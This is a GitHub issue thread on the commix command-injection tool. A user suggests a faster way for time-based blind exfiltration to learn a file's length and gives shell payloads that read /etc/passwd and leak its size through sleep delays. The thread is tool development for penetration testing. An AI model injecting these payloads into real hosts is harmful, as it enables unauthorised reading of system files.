Improve some aspects of "Time Based Exfiltration"

[Abyss-W4tcher]

Hi,

I was running commix against a time based vulnerable host, and noticed that it took a lot of time to determine the size of a file when using --file-read. The problem is that it's using the increment technique (e.g. - Is the file size equal to 1 ? - No. Is the file size equal to 2 ? - No. etc.).

Check this python pseudo-code, which illustrates an idea to improve the efficiency :

stat --printf="%s" /etc/passwd -> 3671 (but it's blind, we don't see it directly)

file_length = ''
cmd_output_length = exec('out_length=$(stat --printf="%s" /etc/passwd) && sleep $(expr length "$out_length")').elapsed_time() # Grab output length, e.g. 4 in "3671"
for i in cmd_output_length:
     # We iterate over each character of the "stat" output, and sleep accordingly to its value
     file_length += exec(f'tts="$(stat --printf="%s" /etc/passwd | cut -c{i+1}-{i+1})" && sleep "$tts"').elapsed_time() # tts = time to sleep

# file_length = '3671'

It it is not necessary to sleep "3" seconds for number 3, we can use the increment technique on each digit, as it may be faster too. The improvement reside in the "stat --printf="%s" /etc/passwd".

The time gained is considerable I think, compared to the actual version :

str="$(echo $(cat /etc/passwd))"
str1=$(expr length "$str")
if [ 22 -ne $str1 ]
then sleep 0
else sleep 1
fi 

I do not know the project enough to provide a PR, but I'd like to hear your thoughts about this idea !

NB : I also noticed that commix wasn't checking if the file existed, or if it was empty. I think this could be easily fixed too :

test -f file || sleep 1 # Check if file exists
[ -s file ] || sleep 1 # Check if file exists but is empty

[stasinopoulos]

@Abyss-W4tcher thanks for your suggestion. I will check it out in detail :)